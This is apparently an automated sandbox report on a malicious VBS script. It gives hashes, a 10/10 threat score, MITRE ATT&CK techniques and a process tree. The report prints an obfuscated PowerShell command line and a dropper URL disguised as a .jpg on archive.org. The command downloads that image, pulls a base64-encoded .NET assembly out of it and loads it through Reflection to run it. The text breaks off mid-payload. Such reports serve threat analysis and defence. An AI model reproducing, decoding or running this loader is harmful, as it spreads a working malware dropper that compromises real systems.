f45da766b2669cba563f9c59d97c55b5ee73990f85f87f619d136ccbae00d61f

General

Target

madamwebwin7MPDW-constraints.vbs
Size

112KB
MD5

d16a594241bdd18814c7c8f184a02210
SHA1

a544bc1a93d10c01ec6880adaba6e11fed6d900d
SHA256

f45da766b2669cba563f9c59d97c55b5ee73990f85f87f619d136ccbae00d61f
SHA512

62f68f1c48200b69deb0a00543d42eaa1194942eac9e1f13749ba913d97662d3c87c0dfb0eb24bf27802f58602988e149fee478b48b1853dd705c533a8330cbe
SSDEEP

1536:FkLcccOgt5pz9UGwcFsYmOKVUJW4Wrle/PhG+/kery+bG8:8gt5pmGwisYmOKdS7b

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	660	powershell.exe
4	660	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1704	powershell.exe
660	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1704	powershell.exe
660	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	660	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2536 wrote to memory of 1704	2536	WScript.exe	29
PID 2536 wrote to memory of 1704	2536	WScript.exe	29
PID 2536 wrote to memory of 1704	2536	WScript.exe	29
PID 1704 wrote to memory of 660	1704	powershell.exe	31
PID 1704 wrote to memory of 660	1704	powershell.exe	31
PID 1704 wrote to memory of 660	1704	powershell.exe	31

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\madamwebwin7MPDW-constraints.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌VQBy┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌JwBo┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bw┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌Og┐ ∹ ˂ ≷ ㏌v┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌aQBh┐ ∹ ˂ ≷ ㏌Dg┐ ∹ ˂ ≷ ㏌M┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌z┐ ∹ ˂ ≷ ㏌DE┐ ∹ ˂ ≷ ㏌M┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌dQBz┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌YQBy┐ ∹ ˂ ≷ ㏌GM┐ ∹ ˂ ≷ ㏌a┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌HY┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌cgBn┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌3┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌aQB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQBz┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌dgBi┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌Xw┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌D┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌D┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌Nw┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌DY┐ ∹ ˂ ≷ ㏌Xw┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌D┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌D┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌Nw┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌DY┐ ∹ ˂ ≷ ㏌LwB2┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌cw┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Go┐ ∹ ˂ ≷ ㏌c┐ ∹ ˂ ≷ ㏌Bn┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Hc┐ ∹ ˂ ≷ ㏌ZQBi┐ ∹ ˂ ≷ ㏌EM┐ ∹ ˂ ≷ ㏌b┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bgB0┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌PQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌E4┐ ∹ ˂ ≷ ㏌ZQB3┐ ∹ ˂ ≷ ㏌C0┐ ∹ ˂ ≷ ㏌TwBi┐ ∹ ˂ ≷ ㏌Go┐ ∹ ˂ ≷ ㏌ZQBj┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌BT┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌E4┐ ∹ ˂ ≷ ㏌ZQB0┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌VwBl┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌QwBs┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌ZQBC┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌B3┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌YgBD┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌aQBl┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌EQ┐ ∹ ˂ ≷ ㏌bwB3┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌b┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BE┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌Cg┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌VQBy┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌KQ┐ ∹ ˂ ≷ ㏌7┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌aQBt┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌ZwBl┐ ∹ ˂ ≷ ㏌FQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌WwBT┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌FQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌LgBF┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌YwBv┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌aQBu┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌XQ┐ ∹ ˂ ≷ ㏌6┐ ∹ ˂ ≷ ㏌Do┐ ∹ ˂ ≷ ㏌VQBU┐ ∹ ˂ ≷ ㏌EY┐ ∹ ˂ ≷ ㏌O┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Ec┐ ∹ ˂ ≷ ㏌ZQB0┐ ∹ ˂ ≷ ㏌FM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌By┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌bgBn┐ ∹ ˂ ≷ ㏌Cg┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌QgB5┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌ZQBz┐ ∹ ˂ ≷ ㏌Ck┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BG┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌PQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌P┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌8┐ ∹ ˂ ≷ ㏌EI┐ ∹ ˂ ≷ ㏌QQBT┐ ∹ ˂ ≷ ㏌EU┐ ∹ ˂ ≷ ㏌Ng┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌F8┐ ∹ ˂ ≷ ㏌UwBU┐ ∹ ˂ ≷ ㏌EE┐ ∹ ˂ ≷ ㏌UgBU┐ ∹ ˂ ≷ ㏌D4┐ ∹ ˂ ≷ ㏌Pg┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌Ds┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BG┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌PQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌P┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌8┐ ∹ ˂ ≷ ㏌EI┐ ∹ ˂ ≷ ㏌QQBT┐ ∹ ˂ ≷ ㏌EU┐ ∹ ˂ ≷ ㏌Ng┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌F8┐ ∹ ˂ ≷ ㏌RQBO┐ ∹ ˂ ≷ ㏌EQ┐ ∹ ˂ ≷ ㏌Pg┐ ∹ ˂ ≷ ㏌+┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BJ┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bp┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌V┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌bgBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌BP┐ ∹ ˂ ≷ ㏌GY┐ ∹ ˂ ≷ ㏌K┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BG┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌Ck┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bgBk┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌bgBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌ZQBU┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌B0┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌E8┐ ∹ ˂ ≷ ㏌Zg┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌RgBs┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Zw┐ ∹ ˂ ≷ ㏌p┐ ∹ ˂ ≷ ㏌Ds┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bz┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌YQBy┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌LQBn┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌w┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌LQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌LQBn┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BJ┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BJ┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌r┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BG┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌YQBn┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌T┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌ZwB0┐ ∹ ˂ ≷ ㏌Gg┐ ∹ ˂ ≷ ㏌Ow┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌YQBz┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌Ng┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌Ew┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bo┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌PQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌ZQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQB4┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌LQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌cgB0┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌bgBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌7┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YgBh┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌2┐ ∹ ˂ ≷ ㏌DQ┐ ∹ ˂ ≷ ㏌QwBv┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌ZQBU┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌e┐ ∹ ˂ ≷ ㏌B0┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌UwB1┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌aQBu┐ ∹ ˂ ≷ ㏌Gc┐ ∹ ˂ ≷ ㏌K┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bh┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BJ┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌Hg┐ ∹ ˂ ≷ ㏌L┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YgBh┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌2┐ ∹ ˂ ≷ ㏌DQ┐ ∹ ˂ ≷ ㏌T┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌ZwB0┐ ∹ ˂ ≷ ㏌Gg┐ ∹ ˂ ≷ ㏌KQ┐ ∹ ˂ ≷ ㏌7┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YwBv┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BC┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌WwBT┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌EM┐ ∹ ˂ ≷ ㏌bwBu┐ ∹ ˂ ≷ ㏌HY┐ ∹ ˂ ≷ ㏌ZQBy┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌XQ┐ ∹ ˂ ≷ ㏌6┐ ∹ ˂ ≷ ㏌Do┐ ∹ ˂ ≷ ㏌RgBy┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌bQBC┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌cwBl┐ ∹ ˂ ≷ ㏌DY┐ ∹ ˂ ≷ ㏌N┐ ∹ ˂ ≷ ㏌BT┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌cgBp┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Zw┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YgBh┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌2┐ ∹ ˂ ≷ ㏌DQ┐ ∹ ˂ ≷ ㏌QwBv┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌p┐ ∹ ˂ ≷ ㏌Ds┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bs┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌YQBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BB┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌cwBl┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YgBs┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌9┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌WwBT┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌cwB0┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌FI┐ ∹ ˂ ≷ ㏌ZQBm┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌ZQBj┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌aQBv┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌LgBB┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌cwBl┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌YgBs┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌XQ┐ ∹ ˂ ≷ ㏌6┐ ∹ ˂ ≷ ㏌Do┐ ∹ ˂ ≷ ㏌T┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌YwBv┐ ∹ ˂ ≷ ㏌G0┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌BC┐ ∹ ˂ ≷ ㏌Hk┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bl┐ ∹ ˂ ≷ ㏌HM┐ ∹ ˂ ≷ ㏌KQ┐ ∹ ˂ ≷ ㏌7┐ ∹ ˂ ≷ ㏌CQ┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌B5┐ ∹ ˂ ≷ ㏌H┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌g┐ 